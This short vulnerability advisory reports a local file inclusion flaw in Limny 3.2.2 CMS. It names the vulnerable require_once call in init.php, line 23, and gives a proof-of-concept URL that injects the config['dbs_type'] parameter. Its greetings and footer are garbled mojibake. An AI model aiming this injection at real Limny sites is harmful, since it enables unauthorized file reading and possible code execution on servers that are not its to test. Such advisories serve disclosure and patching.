Limny version 3.2.2 suffers from a local file inclusion vulnerability.
c47336cf7bc4e0df91b95d76e9b2a0ac922e07c67d630554d6c95b85c858fe97
========================================================================
| # Title : limny 3.2.2 Local File Inclusion vulnerability
| # Author : indoushka
| # email : indoushka4ever@gmail.com
| # Tested on : windows 8.1 FranASSais V.(Pro)
| # Version : 3.2.2
| # Vendor : http://www.limny.org/
| # Dork : n/a
========================================================================
poc :
File : C:\www\limny-3.2.2\init.php
Line : 23
Function : require_once
Variables : $config['dbs_type']
http://127.0.0.1/limny-3.2.2/init.php?config[%27dbs_type%27]=(Ev!l)
Greetz : aua'>>a'1/2a'1/2a'dega'deg aua'degaua'degau a'>>a'*a'*auaua'>>------au-auau-a'deg a'degaua'degauPSaua'3a'>>au-------- aua'degauau!a'>>auau aua'degauaua'*oauaua'degau ------
|
jericho * Larry W. Cashdollar * moncet-1 * achraf.tn |
|
===================== pa'degaua'1/2a'>>au auauoauau aua'>>auauauauauauC/ =============================